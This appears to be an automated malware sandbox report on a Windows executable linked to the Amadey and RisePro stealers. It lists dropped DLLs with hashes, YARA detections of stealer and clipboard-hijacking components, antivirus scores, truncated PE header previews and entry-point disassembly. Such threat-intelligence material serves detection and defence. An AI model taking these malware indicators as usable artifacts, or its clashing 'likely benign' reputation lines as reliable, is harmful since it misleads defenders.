| a5PfQvvi4y.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader |
| 4fMLTRkOfB.exe | malicious | Amadey, RisePro Stealer |
| file.exe | malicious | Amadey, RisePro Stealer |
| SecuriteInfo.com.Win32.PWSX-gen.29871.25289.exe | malicious | Amadey, RisePro Stealer |
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1285632
                                                                                                    Entropy (8bit):6.460494158653329
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:IvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggky+yC7:IsMPSYcS5wPi095Pbg9y
                                                                                                    MD5:15A42D3E4579DA615A384C717AB2109B
                                                                                                    SHA1:22AEEDEB2307B1370CDAB70D6A6B6D2C13AD2301
                                                                                                    SHA-256:3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
                                                                                                    SHA-512:1EB7F126DCCC88A2479E3818C36120F5AF3CAA0D632B9EA803485EE6531D6E2A1FD0805B1C4364983D280DF23EA5CA3AD4A5FCA558AC436EFAE36AF9B795C444
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                    • Antivirus: Virustotal, Detection: 78%, Browse
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, Detection: malicious, Browse
                                                                                                    • Filename: UeW2b6mU6Z.exe, Detection: malicious, Browse
                                                                                                    • Filename: tA6etkt3gb.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, Detection: malicious, Browse
                                                                                                    • Filename: l2ZKczbGRq.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exe, Detection: malicious, Browse
                                                                                                    • Filename: a5PfQvvi4y.exe, Detection: malicious, Browse
                                                                                                    • Filename: 4fMLTRkOfB.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.PWSX-gen.29871.25289.exe, Detection: malicious, Browse
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):112128
                                                                                                    Entropy (8bit):6.400158525810517
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Q3uSD+ZwruS0bGcuZRt2sSZV/Q3IegRQod4l:AuTiabHuZRAFtlD4l
                                                                                                    MD5:726CD06231883A159EC1CE28DD538699
                                                                                                    SHA1:404897E6A133D255AD5A9C26AC6414D7134285A2
                                                                                                    SHA-256:12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
                                                                                                    SHA-512:9EA82E7CB6C6A58446BD5033855947C3E2D475D2910F2B941235E0B96AA08EEC822D2DD17CC86B2D3FCE930F78B799291992408E309A6C63E3011266810EA83E
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                    • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, Detection: malicious, Browse
                                                                                                    • Filename: UeW2b6mU6Z.exe, Detection: malicious, Browse
                                                                                                    • Filename: tA6etkt3gb.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, Detection: malicious, Browse
                                                                                                    • Filename: l2ZKczbGRq.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exe, Detection: malicious, Browse
                                                                                                    • Filename: a5PfQvvi4y.exe, Detection: malicious, Browse
                                                                                                    • Filename: 4fMLTRkOfB.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.PWSX-gen.29871.25289.exe, Detection: malicious, Browse
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1504
                                                                                                    Entropy (8bit):5.274826074581965
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3xSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNUNEr8H0UMem:BSU4y4RQmFoUeCamfm9qr9tK8NfUNEIa
                                                                                                    MD5:2D9F053F15E277FBDF0DC512648E1C41
                                                                                                    SHA1:B4AFA34FA178947357BEAEC124CBB68DC6CD1B26
                                                                                                    SHA-256:9910FCD7442310F9B024BB282BF00D78E2DC6692001DB9A6F1A01BE15F7C9D29
                                                                                                    SHA-512:93451C6E917C8CF544CEE49854C0FB40BC24C8A8A50A897E2201E6755E584DE7CCDA8889347B95C573050F0D4ADD139716E905C9A52CDF51B4C04BE7EE89D6D0
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3010048
                                                                                                    Entropy (8bit):6.5934833981591465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:uSB7N+K2oIqvjWi3wkCL2SnvSiGQbiF31ZPGSus4Fmh:jB7N+K2oIqn3jCqGSHmiF31dGSJaC
                                                                                                    MD5:6AFD3B5B7EFFE4BB0500FE08DD1F6ED7
                                                                                                    SHA1:C0B8D6E8B660AA79851BD237C162ED437D3C047C
                                                                                                    SHA-256:441ADF73DCC0324843D1E42824E7E9473960C859C748A87AC7AF4460535AAF2F
                                                                                                    SHA-512:DA0D387D54151A95993CF4F2AF96202D68403E09BD338A3182108EC3150FD06BD565A1BE1AF82481ACC6BDED5D8E4DF05E029EE89622E410E52E3CCF611C96D6
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                                                                    • Antivirus: Virustotal, Detection: 54%, Browse
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:false
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6140
                                                                                                    Entropy (8bit):7.780543792138917
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:WbXU2qLn/TPqH/TPqQurqx7FTKnE+rs43XlTKnE+rs43M1n0R6wEZJYM3XKoQ:uU247aDbFTyE+rs431TyE+rs43QKEX5M
                                                                                                    MD5:68E20C18949CA8D299AF0CA351547899
                                                                                                    SHA1:5D23C732A302C978F253ADD8CB0C31326CC17C9E
                                                                                                    SHA-256:14F2AE838B604855BD677590CB5EF9788DFE2FD22EB2F3500AA22DD5390F3A01
                                                                                                    SHA-512:4017479F312E4E0817C9C4ACD2FB9796A9E799E076F003FDEF9729EE34CADE46D7A21266E762967E709532C6D9B183B8865D2EB47DFC255D4B7E272F05C18731
                                                                                                    Malicious:true
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.688505748329201
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                                                                    MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                                                                    SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                                                                    SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                                                                    SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.690895772725941
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                    MD5:A002E80B55673139253599B753BDC01A
                                                                                                    SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                    SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                    SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.694982189683734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                    MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                    SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                    SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                    SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.690394987545919
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                    MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                    SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                    SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                    SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.69782189124949
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                    MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                                                    SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                                                    SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                    SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                    Malicious:false
                                                                                                    Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.6994061563025005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                    MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                    SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                    SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                    SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):112128
                                                                                                    Entropy (8bit):6.400158525810517
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Q3uSD+ZwruS0bGcuZRt2sSZV/Q3IegRQod4l:AuTiabHuZRAFtlD4l
                                                                                                    MD5:726CD06231883A159EC1CE28DD538699
                                                                                                    SHA1:404897E6A133D255AD5A9C26AC6414D7134285A2
                                                                                                    SHA-256:12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
                                                                                                    SHA-512:9EA82E7CB6C6A58446BD5033855947C3E2D475D2910F2B941235E0B96AA08EEC822D2DD17CC86B2D3FCE930F78B799291992408E309A6C63E3011266810EA83E
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                    • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L...j..e...........!.....$...........f.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text...6#.......$.................. ..`.rdata..4i...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1285632
                                                                                                    Entropy (8bit):6.460494158653329
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:IvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggky+yC7:IsMPSYcS5wPi095Pbg9y
                                                                                                    MD5:15A42D3E4579DA615A384C717AB2109B
                                                                                                    SHA1:22AEEDEB2307B1370CDAB70D6A6B6D2C13AD2301
                                                                                                    SHA-256:3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
                                                                                                    SHA-512:1EB7F126DCCC88A2479E3818C36120F5AF3CAA0D632B9EA803485EE6531D6E2A1FD0805B1C4364983D280DF23EA5CA3AD4A5FCA558AC436EFAE36AF9B795C444
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                    • Antivirus: Virustotal, Detection: 78%, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d...i..e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):288
                                                                                                    Entropy (8bit):3.3985817340273097
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:DzX4RKUEZ+lX1y6y2l+lRdtPjgsW2YRZuy0lt/uut0:f4RKQ1y6NkDHjzvYRQVBt0
                                                                                                    MD5:82D864F71511B4574815CA0483C7F965
                                                                                                    SHA1:83AF63AE4639CC61C69B94D67A424158B753758E
                                                                                                    SHA-256:58E6D87F8BA41D0333C3FF73A54F409539061D1C6F6532E412795D7105D1E20B
                                                                                                    SHA-512:DB7D6D669499BD37847581110B4764FBA4E3A426ED3658AED87B3360C3CFBF6C7C656FCF42D60C41A6B181DA814F0F2B98910F5AC66761F283E8FC2167E65229
                                                                                                    Malicious:false
                                                                                                    Preview:....].X.I.aC.I.D.d.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.9.f.d.8.5.1.a.4.f.\.e.x.p.l.o.r.h.a...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):6.5934833981591465
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                                                                    File size:3'010'048 bytes
                                                                                                    MD5:6afd3b5b7effe4bb0500fe08dd1f6ed7
                                                                                                    SHA1:c0b8d6e8b660aa79851bd237c162ed437d3c047c
                                                                                                    SHA256:441adf73dcc0324843d1e42824e7e9473960c859c748a87ac7af4460535aaf2f
                                                                                                    SHA512:da0d387d54151a95993cf4f2af96202d68403e09bd338a3182108ec3150fd06bd565a1be1af82481acc6bded5d8e4df05e029ee89622e410e52e3ccf611c96d6
                                                                                                    SSDEEP:49152:uSB7N+K2oIqvjWi3wkCL2SnvSiGQbiF31ZPGSus4Fmh:jB7N+K2oIqn3jCqGSHmiF31dGSJaC
                                                                                                    TLSH:0BD53B51B505B3CBD88E17788627CEC59C5D03B957100AD3A87CA5BABE63CC927F6C28
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L..
                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                    Entrypoint:0x719000
                                                                                                    Entrypoint Section:.taggant
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x65E4126F [Sun Mar 3 06:02:23 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                    Instruction
                                                                                                    jmp 00007F449C898BFAh
                                                                                                    bswap esp
                                                                                                    sub eax, 00000000h
                                                                                                    add cl, ch
                                                                                                    add byte ptr [eax], ah
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [edi], al
                                                                                                    or al, byte ptr [eax]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], dh
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [edx], ah
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a056 | 0x6a | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x317708 | 0x10 | qatcqnjl |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x3176b8 | 0x18 | qatcqnjl |
